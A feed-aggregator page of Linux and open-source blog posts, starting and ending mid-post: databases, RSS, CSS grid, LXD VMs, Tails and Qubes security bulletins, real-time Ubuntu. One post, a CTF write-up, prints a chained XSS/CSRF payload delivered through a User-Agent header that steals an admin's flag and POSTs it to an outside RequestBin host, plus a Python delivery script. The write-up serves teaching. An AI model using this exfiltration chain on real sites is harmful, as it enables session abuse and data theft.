Some NoSQL technologies are being adopted quickly, but communities are smaller and more fractured.

Some NoSQL communities benefit from open systems and concerted commitment to onboarding users.

There are also multiple proprietary NoSQL services that organisations can use. 
PropertiesRDBMSs must exhibit four “ACID” properties: Atomicity, Consistency, Isolation, Durability.

NoSQL adheres to 2 CAP theorem, and 2 of the 3 properties can be guaranteed: Consistency, Availability and Partition Tolerance.

When to use SQL and NoSQL in your organisation

SQL can be used for big data, but NoSQL handles much bigger data by nature. SQL is also good to use when data is conceptually modelled as tabular. It’s recommended for systems where consistency is critical. Some of the possible use cases for SQL are managing data for e-commerce applications, inventory management, payroll, customer data, etc.

NoSQL databases are categorised into different structures, and they can be a document database, key-value, wide column, graph and search. Each type has its strong properties that fit specific use cases, such as:

  • Document: a general-purpose database for web applications, mobile applications and social networks.  
  • Key-value: large amounts of data with simple lookup queries. The most common use case is caching. Memcached is one example. It is an in-memory key-value object-store. MediaWiki uses it for caching values. It reduces the need to perform expensive computations and the load on database servers.
  • Wide-column: large amounts of data with predictable query patterns. An excellent example is an inventory management system that supports critical use cases and applications that need real-time analytics capabilities.
  • Graph: analysing and traversing relationships between corresponding data, which is suitable for use cases like fraud detection & analytics, recommendation engine, and social media and social network graphs.
  • Search: this is good for application search, log analytics, data observability, data ingestion, etc.

Conclusion

The criteria above provide a helpful rubric for database administrators, analysts and architects to make informed decisions around SQL and NoSQL.   Consider critical data needs and acceptable tradeoffs in properties, data structure performance, and communities when evaluating both options.

Canonical’s database offering

Canonical can offer support and managed services for both NoSQL and SQL databases such as MySQL, Postgres, Redis, Cassandra and MongoDB. 

10 June, 2022 06:38PM

Oli Warner: Wait! What happened to RSS?!

While I was busy aging like soft cheese, someone killed-off* RSS.

It used to be everywhere, now it’s gone; hidden or dead. How do you kids stay up to date with the websites you like? Do you know what RSS does? How are websites supposed to advertise update-subscriptions?

Really Simple Syndication was invented in the Cretaceous period, roughly 100 million years ago. It enabled websites’ fans to get updates, quickly and easily. It got used for everything else too and remains a fundamental part of podcasting, but in the explosion of Web 2.0, it was a very serious part of websites keeping in touch with their user-bases.

I recently restored the Subscribe Icon back to the main navigation here when it started to dawn on me…

Do you kids know what to do with RSS?

Once upon a time, you clicked a link to a RSS feed, you’d see an option to do something with it: save a live bookmark in Firefox, or add it to Google Reader. Both long dead. There still are a clutch other readers today, but the automated handling of this, and seemingly the desire of browsers to handle this seems to have evaporated, leaving novices in the lurch.

If you click a link to my main feed, your browser might pretty-format the XML code but that’s all the help you get. Update: The raw RSS is now styled via XSLT so it does at least look better than a page of XML. More at the end.

You still need to plumb that URL into something. And that relies on you knowing what it is. So straw poll, please. If you don’t know anything about RSS, let this old doughnut know and I’ll stop pushing it. Ideally you’ll also have an answer to my next question…

How do you subscribe to websites in 2022?

I’m people so I’ll go first: I still use RSS. I use Feedly to get updates from about a hundred websites, and Hacker News, and I’m happy with my wash. This is how it’s been for a decade.

That’s where my consternation originated. Do people just consume what they’re now fed through Platforms: Facebook, Twitter and Tiktok? Would I have to hawk myself on each platform? I’m concerned that’s just feeding the problem. It’s not even apparent how websites are doing this either now. I know I’ve hacked together a few feed generators for websites without RSS, just so I can get updates.

I want to know how you handle updates. Please tell me in the comments or by email.

Why are Google, Microsoft and Apple so inactive here?

It’s super easy to blame “The Rise of Platforms”, but hard to ignore that the big desktop and mobile operating systems have done nothing to help. Browser vendors washed their hands of RSS. What’s especially galling is these companies run personalised news aggregation services, but none lets you add your own feeds. I’d think that each of them has a vested interest in reining back control of web consumption. Maybe the EU can mandate RSS support.

I don’t have a high note to end on here. I stopped paying attention and the world changed on me, and I can’t figure out why. I just feel old.

Update: Teach people what your RSS feed is with XSLT

My biggest single complaint was that linking to a wall of XML would just confuse people. I don’t think we’ll convince any browser vendors to give us back RSS support in the short term, but XSLT came up a few times in your comments here, emails, and comments on Hacker News. Big thanks. XSLT is a templating and styling language for XML and it has good browser support.

With it you can transform an RSS feed into something that looks like a normal web page. And explain what to do next, if they don’t already know. My XSLT is super-simple, please have a look. I’ve dropped in a message explaining what RSS is, that you need an aggregator. It might be nice to offer email subscriptions from here directly one day.

* Is RSS really “dead” if you’re still using it?

A few people took exception with my leading claim that RSS seems dead. They’re still using it. You’re still using it. Bloody hell, I just said I’m still using it. How could it be dead?

Latin is a dead language. People who make a special effort still understand it, and some even use it, and there’s plenty evidence it existed, scattered through modern languages… But as soon as the Roman Empire fell, and the Western Empire rotted away, around 400AD, poor education meant Latin died off rapidly. Without the central push and steering, local languages took over.

Well… RSS is in a similar predicament. Browsers stopped speaking RSS. They don’t detect it. They don’t offer subscription options to users. They used to a few years ago. That has to have had an impact on the number of people using it today. It’s almost 10 years since the last spec revision. The number of services providing feeds RSS and iCal (another important protocol) has plummeted as proprietary notification protocols have taken over in disparate third party services.

If you’re not going with me, consider this: When was RSS last really alive?

I think this matters. It matters to me, and I’d wager that if you’re reading this, you probably still use RSS too. If we want it to carry on existing, being provided for us, we need to start thinking about the reasons it’s in decline —even if it’s not “dead”— and where is best to apply pressure to reverse that.

10 June, 2022 12:00AM

June 09, 2022

hackergotchi for Purism PureOS

Purism PureOS

PureBoot’s Powerful Recovery Console

Normally when we talk about our high-security boot firmware PureBoot, it’s in the context of the advanced tamper detection it adds to a system. For instance, recently we added the ability to detect tampering even in the root file system. While that’s a critical benefit PureBoot provides over our default coreboot firmware, it also provides […]

The post PureBoot’s Powerful Recovery Console appeared first on Purism.

09 June, 2022 06:39PM by Kyle Rankin

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: LXD virtual machines: an overview


While LXD is mostly known for providing system containers, since the 4.0 LTS, it also natively supports virtual machines. With the recent 5.0 LTS, LXD virtual machines are at feature parity with containers. In this blog, we’ll explore some of the main LXD virtual machine features and how you can use them to run your infrastructure.

Why did we include VMs?

When talking about LXD, we often focus on system containers. After all, they are efficient, dense, and give the experience of a VM while being light on resources. However, since containers use the kernel of the host OS, they are not suitable when you would like to run your workloads in a different operating system, or with a different kernel than that of the host.

We have seen many of our users using LXD in parallel with something like libvirt, which gives some overhead as you’d have to deal with two different environments and configurations. With LXD VMs we unified that experience.

Some enterprise policies do not consider containers safe enough for certain workloads, so including VMs allows our users to meet those policies as well.

Now, you can use system containers, VMs or manage a cluster that mixes the two, covering most of the infrastructure use cases you might have.

What are LXD VMs based on?

LXD VMs are based on QEMU, like other VMs you would get through libvirt and similar tools. We are, however, opinionated about the setup and the experience, which is why we use a modern Q35 layout with UEFI and SecureBoot by default. All devices are virtio-based (we don’t do any complex device emulation at the host level). 

While functionality doesn’t differ much from other VM virtualization tools, we want to provide a better experience out of the box with pre-installed images and optimised choices. Thanks to a built-in agent, experience with running commands and working with files (‘lxc exec’ and ‘lxc file’) is exactly the same as with containers.

How to set up an LXD virtual machine

The best way to launch VMs is using the images from our community server. There is a wide choice of distributions available, these images are automatically tested daily, and also include support for the LXD agent out of the box.

Creating a VM is as simple as:

lxc launch ubuntu:22.04 ubuntu --vm

Additional details are available here.

Desktop images

In addition to cloud images for a variety of distributions, we also support desktop images that allow you to launch a desktop VM with no additional configuration needed.

For launching an Ubuntu 22.04 VM the command would look like this:

lxc launch images:ubuntu/22.04/desktop ubuntu --vm -c limits.cpu=4 -c limits.memory=4GiB --console=vga   

The whole process takes seconds, as shown below. 

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh3.googleusercontent.com/FAiSwE8u_qu4P4Yc9u35CZK3hVTxAhaMegHcjBRvgLRXpy7-NCUv8PH44_nZi3KS-R6zxXwbdo0Rp8sC1OBNtTNPNFDRRoNcvRk3hUFSksZuewWrWwT2xYuJ_LSQD0x3kuO67WRB8b0baB7Hbw" width="720" /> </noscript>

Read the full tutorial

ISO file

If you want to install an OS or a distribution that is not among the available images, you can install any OS via the ISO file. 

For more details, you can visit this discussion

Running Windows

If you would like to run a Windows VM, you would first need to repackage the Windows ISO file, using distrobuilder, before proceeding to install it into an LXD virtual machine.

The process is then relatively simple, and you can follow the steps in this video.

Final words on feature parity with containers

With the 4.0 release, LXD virtual machines were initially slightly limited in features. With the 5.0 LTS release, they are now effectively at parity with containers. 

LXD VMs now come with vTPM support, offering security-related functions. For instance, s this allows users to create and store keys that are private and authenticate access to their systems. VMs also come with arbitrary PCI passthrough support that enables users to access and manage a variety of hardware devices from a virtual machine. They can now also be live-migrated and support some device hotplug and additional storage options.

If you would like to test this for yourself, follow this guide for all major Linux distributions.

To discuss issues, questions, or to get help, please visit our community forum.

09 June, 2022 03:03PM

hackergotchi for Tails

Tails

Tails report for May 2022

Here are a few highlights about what we did in May, among many other things:

  • We implemented many improvements to the Tor Connection assistant. This makes is much easier for people in Asia to circumvent censorship. For details, see the Tails 5.1 release notes.

  • We wrote a new homepage for the Unsafe Browser when you are not connected to the Tor network yet. This new version makes it easier to understand how to sign in to the network using a captive portal.

  • We started organized training and usability tests sessions for August in Brazil.

  • Tails 5.0 was released on May 3. It was the first version of Tails based on Debian 11 (Bullseye) and brought new versions of a lot of the software included in Tails and new OpenPGP tools.

  • We started evaluating Mirrorbits to manage our download mirror pool. On top of decreasing the required maintenance work, this should make downloads of Tails faster and more reliable.

  • Tails has been started more than 769 997 times this month. This makes 24 838 boots a day on average.

09 June, 2022 10:00AM

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: BSidesSF 2022 CTF: TODO List

This year, I was the author of a few of our web challenges. One of those that gave both us (as administrators) and the players a few difficulties was “TODO List”.

Upon visiting the application, we see an app with a few options, including registering, login, and support. Upon registering, we are presented with an opportunity to add TODOs and mark them as finished:

Add TODOs

If we check robots.txt we discover a couple of interesting entries:

1
2
3
User-agent: *
Disallow: /index.py
Disallow: /flag

Visiting /flag, unsurprisingly, shows us an “Access Denied” error and nothing further. It seems that we’ll need to find some way to elevate our privileges or compromise a privileged user.

The other entry, /index.py, provides the source code of the TODO List app. A few interesting routes jump out at us, not least of which is the routing for /flag:

1
2
3
4
5
6
7
8
@app.route('/flag', methods=['GET'])
@login_required
def flag():
    user = User.get_current()
    if not (user and user.is_admin):
        return 'Access Denied', 403
    return flask.send_file(
            'flag.txt', mimetype='text/plain', as_attachment=True)

We see that we will need a user flagged with is_admin. There’s no obvious way to set this value on an account. User IDs as stored in the database are based on a sha256 hash, and the passwords are hashed with argon2. There’s no obvious way to login as an administrator here. There’s an endpoint labeled /api/sso, but it requires an existing session.

Looking at the frontend of the application, we see a pretty simple Javascript to load TODOs from the API, add them to the UI, and handle marking them as finished on click. Most of it looks pretty reasonable, but there’s a case where the TODO is inserted into an HTML string here:

1
2
3
const rowData = `<td><input type='checkbox'></td><td>${data[k].text}</td>`;
const row = document.createElement('tr');
row.innerHTML = rowData;

This looks awfully like an XSS sink, unless the server is pre-escaping the data for us in the API. Easy enough to test though, we can just add a TODO containing <span onclick='alert(1)'>Foobar</span>. We quickly see the span become part of the DOM and a click on it gets the alert we’re looking for.

TODOs

At this point, we’re only able to get an XSS on ourselves, otherwise known as a “Self-XSS”. This isn’t very exciting by itself – running a script as ourselves is not crossing any privilege boundaries. Maybe we can find a way to create a TODO for another user?

1
2
3
4
5
6
7
8
9
10
11
12
13
@app.route('/api/todos', methods=['POST'])
@login_required
def api_todos_post():
    user = User.get_current()
    if not user:
        return '{}'
    todo = flask.request.form.get("todo")
    if not todo:
        return 'Missing TODO', 400
    num = user.add_todo(todo)
    if num:
        return {'{}'.format(num): todo}
    return 'Too many TODOs', 428

Looking at the code for creating a TODO, it seems quite clear that it depends on the current user. The TODOs are stored in Redis as a single hash object per user, so there’s no apparent way to trick it into storing a TODO for someone else. It is worth noting that there’s no apparent protection against a Cross-Site Request Forgery, but it’s not clear how we could perform such an attack against the administrator.

Maybe it’s time to take a look at the Support site. If we visit it, we see not much at all but a Login page. Clicking on Login redirects us through the /api/sso endpoint we saw before, passing a token in the URL and generating a new session cookie on the support page. Unlike the main TODO app, no source code is to be found here. In fact, the only real functionality is a page to “Message Support”.

Submitting a message to support, we get a link to view our own message. In the page, we have our username, our IP, our User-Agent, and our message. Maybe we can use this for something. Placing an XSS payload in our message doesn’t seem to get anywhere in particular – nothing is firing, at least when we preview it. Obviously an IP address isn’t going to contain a payload either, but we still have the username and the User-Agent. The User-Agent is relatively easily controlled, so we can try something here. cURL is an easy way to give it a try, especially if we use the developer tools to copy our initial request for modification:

1
2
3
4
5
6
7
curl 'https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryz4kbBFNL12fwuZ57' \
  -H 'cookie: sup_session=75b212f8-c8e6-49c3-a469-cfc369632c72' \
  -H 'origin: https://todolist-support-ebc7039e.challenges.bsidessf.net' \
  -H 'referer: https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'user-agent: <script>alert(1)</script>' \
  --data-raw $'------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="difficulty"\r\n\r\n4\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="message"\r\n\r\nfoobar\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="pow"\r\n\r\n1b4849930f5af9171a90fe689edd6d27\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57--\r\n'

Viewing this message, we see our good friend, the alert box.

Alert 1

Things are beginning to become a bit clear now – we’ve discovered a few things.

  1. The flag is likely on the page /flag of the TODO list manager.
  2. Creating a TODO list entry has no protection against XSRF.
  3. Rendering a TODO is vulnerable to a self-XSS.
  4. Messaging the admin via support appears to be vulnerable to XSS in the User-Agent.

Due to the Same-Origin Policy, the XSS on the support site can’t directly read the resources from the main TODO list page, so we need to do a bit more here.

We can chain these together to (hopefully) retrieve the flag as the admin by sending a message to the admin that contains a User-Agent with an XSS payload that does the following steps:

  1. Uses the XSRF to inject a payload (steps 3+) as a new XSS.
  2. Redirects the admin to their TODO list to trigger the XSS payload.
  3. Uses the Fetch API (or XHR) to retrieve the flag from /flag.
  4. Uses the Fetch API (or XHR) to send the flag off to an endpoint we control.

One additional complication is that <script> tags will not be executed if injected via the innerHTML mechanism in the TODO list. The reasons are complicated, but essentially:

  • innerHTML is parsed using the algorithm descripted in Parsing HTML Fragments of the HTML spec.
  • This creates an HTML parser associated with a new Document node.
  • The script node is parsed by this parser, and then inserted into the DOM of the parent Document.
  • Consequently, the parser document and the element document are different, preventing execution.

We can work around this by using an event handler that will fire asynchronously. My favorite variant of this is doing something like <img src='x' onerror='alert(1)'>.

I began by preparing the payload I wanted to fire on todolist-support as an HTML standalone document. I included a couple of variables for the hostnames involved.

1
2
3
4
5
6
7
8
9
10
11
12
13
<div id='s2'>
const dest='{{dest}}';
fetch('/flag').then(r => r.text()).then(b => fetch(dest, {method: 'POST', body: b}));
</div>
<script>
const ep='{{ep}}';
const s2=document.getElementById('s2').innerHTML;
const fd=new FormData();
fd.set('todo', '<img src="x" onerror="'+s2+'">');
fetch(ep+'/api/todos',
    {method: 'POST', body: fd, mode: 'no-cors', credentials: 'include'}).then(
        _ => {document.location.href = ep + '/todos'});
</script>

I used the DIV s2 to get the escaping right for the Javascript I wanted to insert into the error handler for the image. This would be the payload executed on todolist, while the lower script tag would be executed on todolist-support. This wasn’t strictly necessary, but it made experimenting with the 2nd stage payload easier.

The todolist-support payload triggers a cross-origin request (hence the need for mode: 'no-cors' and credentials: 'include' to the todolist API to create a new TODO. The new TODO contained an image tag with the contents of s2 as the onerror handler (which would fire as soon as rendered).

That javascript first fetched the /flag endpoint, then did a POST to my destination with the contents of the response.

I built a small(ish) python script to send the payload file, and used RequestBin to receive the final flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import requests
import argparse
import os


def make_email():
    return os.urandom(12).hex() + '@example.dev'


def register_account(session, server):
    resp = session.post(server + '/register', data={
        'email': make_email(),
        'password': 'foofoo',
        'password2': 'foofoo'})
    resp.raise_for_status()


def get_support(session, server):
    resp = session.get(server + '/support')
    resp.raise_for_status()
    return resp.url


def post_support_message(session, support_url, payload):
    # first sso
    resp = session.get(support_url + '/message')
    resp.raise_for_status()
    msg = "auto-solution-test"
    pow_value = "c8157e80ff474182f6ece337effe4962"
    data = {"message": msg, "pow": pow_value}
    resp = session.post(support_url + '/message', data=data,
            headers={'User-Agent': payload})
    resp.raise_for_status()


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--requestbin',
            default='https://eo3krwoqalopeel.m.pipedream.net')
    parser.add_argument('server', default='http://localhost:3123/',
            nargs='?', help='TODO Server')
    args = parser.parse_args()

    server = args.server
    if server.endswith('/'):
        server = server[:-1]
    sess = requests.Session()
    register_account(sess, server)
    support_url = get_support(sess, server)
    if support_url.endswith('/'):
        support_url = support_url[:-1]
    print('Support URL: ', support_url)
    payload = open('payload.html').read().replace('\n', ' ')
    payload = payload.replace('{{dest}}', args.requestbin
            ).replace('{{ep}}', server)
    print('Payload is: ', payload)
    post_support_message(sess, support_url, payload)
    print('Sent support message.')


if __name__ == '__main__':
    main()

The python takes care of registering an account, redirecting to the support site, logging in there, then sending the payload in the User-Agent header. Checking the request bin will (after a handful of seconds) show us the flag.

09 June, 2022 07:00AM

Oli Warner: CSS layouts are so much better than they used to be

I’ve been doing this web thing a while, and in finally dropping IE11 support for my last few projects, I’ve been able to use raw CSS —not somebody else’s framework— and it’s been lovely to see how far CSS has come.

You whipper-snappers might not appreciate it but CSS used to be pretty janky. You could style some of your content, but getting it into the right places, in a reproducible way was a headache. It was so inconsistent between browsers, and so incompatible with the designs we were paid to implement, we’d use ghastly devices like image <map>, <frameset> and nested <table> elements. We’ve come a long way since then.

The Holy Grail was A List Apart’s famous article, a culmination of years of forebears delicately floating things around, abusing padding and negative margins to achieve something it took a <table> to do before. It’s hard to appreciate 16 years on, but that article was my bible for a while.

As CSS standards improve and old versions of IE died off we saw the rise of CSS Frameworks, third party code, pre-hacked for edge-cases, just follow their markup, use their classes and everything would work. Most of the time. I’ve been through a few: Blueprint, 960, Bootstrap and most recently Tailwind.

And I hate them all. That’s not fair. They’ve helped me, professionally, cope with an increasing number of browsers, and increasingly complex layouts (waves in responsive), and they’ve definitely got better —depending on your opinion on utility-first classes— but they all reset to something slightly different, and while the form classes are genuinely helpful, and they all served a purpose for layout, I’d rather have not depended on any of them. It’s those moments where you notice that somebody decided that display: table was the best option to meet IE10 support. And until PurgeCSS came along, they also meant a serious hit to the page weight.

But it’s 2022 now and I’m able to drop IE11 support in most new projects. I can drop all this other crap too. I’m naked again, writing real, raw, standards-abiding CSS without having to look up a billion utility classes, not having to inspect everything. I can just write layouts —my way— and concisely throw things onto the page.

I’m sure I’ll still use frameworks for complex components. Forms are a great example of something that starts off very easy and by the time you’re implementing a <fieldset> style and are trying to plug in your error feedback messages, you wish you’d never started. The standards have some way to go there.

The Holy Grail v2022 — Layout doesn’t have to be hard.

Let’s start with the HTML.

<body>
<header>...</header>
<nav>...</nav>
<main>...</main>
<aside>...</aside>
<footer>...</footer>
</body>

The original example 3 (view source if you dare) needed wrappers and hacks. Our modern markup can mean something. We can ditch the flabby wrapper containers. We can even re-order the elements so they make sense to screen readers and other scrapers.

And our CSS just paints those items into a 3×3 grid via grid-template-areas while the grid-template-* rules handle the sizing. There are so many different ways to handle this with display: grid but I like this one.

html{ height: 100% }
body {
min-height: 100%;
display: grid;
grid-template-columns: 180px 1fr 130px;
grid-template-rows: min-content 1fr min-content;
grid-template-areas:
"header header header"
"left center right"
"footer footer footer";
}
body > header { grid-area: header; }
body > nav { grid-area: left; }
main { grid-area: center; }
body > aside { grid-area: right; }
body > footer { grid-area: footer; }

That’s 100% width, 100% height, equal height centre columns.
The Holy Grail in its entirety in 30 lines and change.

And it’s quickly adaptable. If you wanted a maximum width, like a lot of layouts (inc this one) you can just tune the grid-template-columns centre column from 1fr to a minmax width, and use justify-content to align the grid to the centre of the <body> element. I’ll add some padding to push the grid away from the edges too.

body {
margin: 2rem;
min-height: calc(100% - 2rem); /* tune it to keep full height */
grid-template-columns: 180px minmax(0, 690px) 130px;
justify-content: center;
}

Want spacing between zone? Use gap.
Borders and padding can be baked into the sizing using box-sizing.

It’s excruciatingly simple. This is so much better.

One last time, for the years of suffering and hacking and wasted effort, screw you, IE.

09 June, 2022 12:00AM

hackergotchi for Qubes

Qubes

XSAs released on 2022-06-09

The Xen Project has released one or more Xen Security Advisories (XSAs). The security of Qubes OS is affected. Therefore, user action is required.

XSAs that affect the security of Qubes OS (user action required)

The following XSAs do affect the security of Qubes OS:

  • XSA-401
  • XSA-402

Please see QSB-080 for the actions users must take in order to protect themselves, as well as further details about these XSAs:

https://www.qubes-os.org/news/2022/06/09/qsb-080/

XSAs that do not affect the security of Qubes OS (no user action required)

The following XSAs do not affect the security of Qubes OS, and no user action is necessary:

  • (none)

09 June, 2022 12:00AM

QSB-080: Issues with PV domains and PCI passthrough (XSA-401, XSA-402)

We have just published Qubes Security Bulletin (QSB) 080: Issues with PV domains and PCI passthrough (XSA-401, XSA-402). The text of this QSB is reproduced below. This QSB and its accompanying signatures will always be available in the Qubes Security Pack (qubes-secpack).

View QSB-080 in the qubes-secpack:

https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-080-2022.txt

In addition, you may wish to:


             ---===[ Qubes Security Bulletin 080 ]===---

                             2022-06-09

     Issues with PV domains and PCI passthrough (XSA-401, XSA-402)


User action required
---------------------

Users must install the following specific packages in order to address
the issues discussed in this bulletin:

  For Qubes 4.0, in dom0:
  - Xen packages, version 4.8.5-40

  For Qubes 4.1, in dom0:
  - Xen packages, version 4.14.5-2

These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [1] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [2]

Dom0 must be restarted afterward in order for the updates to take
effect.

If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.


Summary
--------

The following security advisories were published on 2022-06-09:

XSA-401 [3] "x86 pv: Race condition in typeref acquisition":

| Xen maintains a type reference count for pages, in addition to a
| regular reference count.  This scheme is used to maintain invariants
| required for Xen's safety, e.g. PV guests may not have direct
| writeable access to pagetables; updates need auditing by Xen.
| 
| Unfortunately, the logic for acquiring a type reference has a race
| condition, whereby a safely TLB flush is issued too early and creates
| a window where the guest can re-establish the read/write mapping
| before writeability is prohibited.

XSA-402 [4] "x86 pv: Insufficient care with non-coherent mappings":

| Xen maintains a type reference count for pages, in addition to a
| regular reference count.  This scheme is used to maintain invariants
| required for Xen's safety, e.g. PV guests may not have direct
| writeable access to pagetables; updates need auditing by Xen.
| 
| Unfortunately, Xen's safety logic doesn't account for CPU-induced
| cache non-coherency; cases where the CPU can cause the content of the
| cache to be different to the content in main memory.  In such cases,
| Xen's safety logic can incorrectly conclude that the contents of a
| page is safe.


Impact
-------

These vulnerabilities, if exploited, could allow malicious PV domains
with assigned PCI devices to escalate their privileges to that of the
host. However, in the default Qubes OS configuration, these
vulnerabilities affect only the stubdomains for sys-net and sys-usb.
Therefore, in order to exploit these vulnerabilities in a default Qubes
installation, an adversary would first have to discover and exploit an
independent vulnerability in QEMU in order to gain control of an
appropriate stubdomain. Only after having done so would the adversary be
in a position to attempt to exploit the vulnerabilities discussed in
this bulletin.

XSA-402 affects only AMD systems and Intel systems before Ivy Bridge
(the third generation of the Intel Core processors). Newer Intel systems
are not affected.


Credits
--------

See the original Xen Security Advisory.


References
-----------

[1] https://www.qubes-os.org/doc/testing/
[2] https://www.qubes-os.org/doc/how-to-update/
[3] https://xenbits.xen.org/xsa/advisory-401.html
[4] https://xenbits.xen.org/xsa/advisory-402.html

--
The Qubes Security Team
https://www.qubes-os.org/security/

09 June, 2022 12:00AM

June 08, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: Canonical at the Open Source Summit North America 2022

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://ubuntu.com/wp-content/uploads/2f60/OSS-2022-Austin-Blog.png" width="720" /> </noscript>

The heart of open source will be beating in Austin and streamed online for the Open Source Summit North America, taking place on 20-25 June 2022.

Open Source Summit is the premier event for open source developers, technologists, and community leaders. It’s a great venue to collaborate, share information, solve problems, and take open source innovation further. 

In this 2022 edition, Canonical will host multiple sessions, from very hands-on and technical talks to discussions exploring the trends that are shaping our industry.

We will address many of the familiar challenges: security, sustainability, and at-scale deployments. We will also delve into some exciting developments like building minimal container images with Ubuntu, or setting up your own micro cloud at home.

Will you be in Austin to attend the Open Source Summit too? Join our community team as well as our speakers on booth B20. We look forward to seeing you there!

Join our sessions at the Open Source Summit North America

Wednesday, 22 June • 11:50am – 12:30pm CDT
Your Own Little HA Cloud at the Edge (or at Home)
Speaker:  Stephane Graber, Project leader for LXD, Canonical
Link to the schedule

Thursday, 23 June • 9:50am – 10:35am CDT
Improving Container Security with System Call Interception
Speakers: Stephane Graber, Project leader for LXD, Canonical & Christian Brauner, Principal Software Engineer, Microsoft
Link to the schedule (co-located Linux Security Summit event)


Friday, 24 June • 11:10am – 11:50am CDT
Rethinking Compliance in a Containerised World
Speakers: Valentin Viennot & Massimiliano Gori, Product, Canonical
Link to the schedule

Friday, 24 June • 11:10am – 11:50am CDTThe Power of the Shell: Measuring Power Consumption of Everyday Linux Commands
Speaker: Pedro Leão Da Cruz, Product Architect, Canonical & Kyle McRobert, Senior Hardware Engineer, Quarch Technology
Link to the schedule

Friday, 24 June • 2:00pm – 3:30pm CDT
How We Built an Ubuntu Distroless Container
Speaker: Valentin Viennot, Containers Product Manager, Canonical
Link to the schedule

Friday, 24 June • 4:00pm – 4:45pm CDT
Crowd-sourcing Vulnerability Severity
Speaker: Henry Coggill, Product Manager, Canonical
Link to the schedule

To get the full programme overview, click here.

08 June, 2022 03:55PM

Ubuntu Blog: An intro to real-time Linux with Ubuntu

A real-time system responds to events within a specified deadline. If the timing constraints of the system are unmet, failure has occurred. In the kernel context, real-time denotes a deterministic response to an external event, aiming to minimize the response time guarantee.

Real-time Beta now available in Ubuntu 22.04 LTS 

Last April, Canonical announced real-time Ubuntu 22.04 LTS Beta for x86 and Arm64 architectures. Based on v5.15 of the Linux kernel, real-time Ubuntu integrates PREEMPT_RT to power the next generation of industrial, robotics, IoT and telco innovations by providing a deterministic response time to their extreme low-latency requirements.

<noscript> <img alt="" height="258" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_499,h_258/https://lh4.googleusercontent.com/rEpyL-r9auXx8KYhFcZS04OAwsG1J8kyLVcR_d5yAqOOp3N88PW82J8b-pcivpm0BFOqG52jKcQkt_zkRNHJcAD4e5_PIpm9mcFu9Awchsd4voxFgi_55uDJBQChFsfodNA1komHRN4HBngrRg" width="499" /> </noscript>
Canonical Ubuntu 22.04 LTS is released

Real-time Ubuntu is available for free for personal use via Ubuntu Advantage, the most comprehensive Linux enterprise subscription, covering all aspects of open infrastructure. Anyone can enable the real-time kernel per the instructions, and we encourage real-time Ubuntu users to help us by reporting bugs

Watch our webinar 

If you want to delve deeper into this topic, we recently hosted a webinar covering:

  • What real-time is and common misconceptions
  • Market applications
  • Linux kernel preemption 
  • Preemption modes available in mainline
  • PREEMPT_RT
  • Real-time Ubuntu 22.04 LTS Beta

Thanks to everyone who attended, asked questions and provided feedback throughout the discussion! For those who couldn’t make it, the webinar is now available on-demand

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/ANaD2EX1ZIjpOU_8RIzQQ8NowsVVusB1fTPRD1wACs7_L3_iU7F7IpGyimgDCAEU9ZYQqh37IEZltI5xjEbIjdbb6GFNGY9Sbd4ge5jufmgJ6ZvxDSdS1bp85fSqJh0wR4EJ_XS5sMkzqJK_pw" width="720" /> </noscript>
Watch our webinar: An Introduction to real-time Linux

Below is a recap of the questions asked during the webinar. 

[Q&A] An Introduction to real-time Linux

Q1) What is inside real-time Ubuntu 22.04 LTS Beta? 

A1) Real-time Ubuntu is a Jammy Jellyfish kernel with the upstream real-time patches applied. 

Q2) When do you expect to be out of Beta?

A2) We are targeting April 2023 for the GA of real-time Ubuntu 22.04 LTS. Extensive testing will help us bring the real-time kernel to production earlier. Please support the Ubuntu community by reporting any bugs you may encounter.

Q3) How will the Beta and the GA release differ?

A3) The GA release will run the latest stable kernel available, and it will include the upstream real-time patches matching up with the version. The real-time Linux Analysis (RTLA) tool, merged into upstream 5.17, will also be available with the production-ready real-time Ubuntu kernel, boosting its debugging capabilities.

Q4) What are the main advantages of using the Ubuntu real-time kernel rather than patching a standard kernel?

A4) The main advantage is the enterprise-grade support you will receive from Canonical. 

Q5) Do you have a recommended hardware configuration for testing real-time Ubuntu?

A5) A feature of the real-time kernel in Linux is that it allows for freedom of hardware. We are testing the Beta release on ARM, AMD and Intel hardware and don’t recommend a particular configuration. 

Q6) Does real-time Ubuntu work with a 32-bit architecture?

A6) No, we currently focus only on 64 bits.

Q7) Are NVIDIA drivers supported under the Ubuntu real-time kernel? 

A7) The Beta release does not support NVIDIA drivers, but that may change in the future.

Q8) Do you plan on supporting this full task isolation patchset?

A8) We will consider including the patch once it lands in the mainline.

Q9.1) Do you plan on making the upcoming Ubuntu releases have a hybrid of real-time queues and standard Linux kernel queues? Q9.2) Will Ubuntu support a kernel with both FIPS 140-2 and real-time enabled?  Q9.3) Is there a plan to move toward certification for safety-critical applications such as DO-178 for aviation?

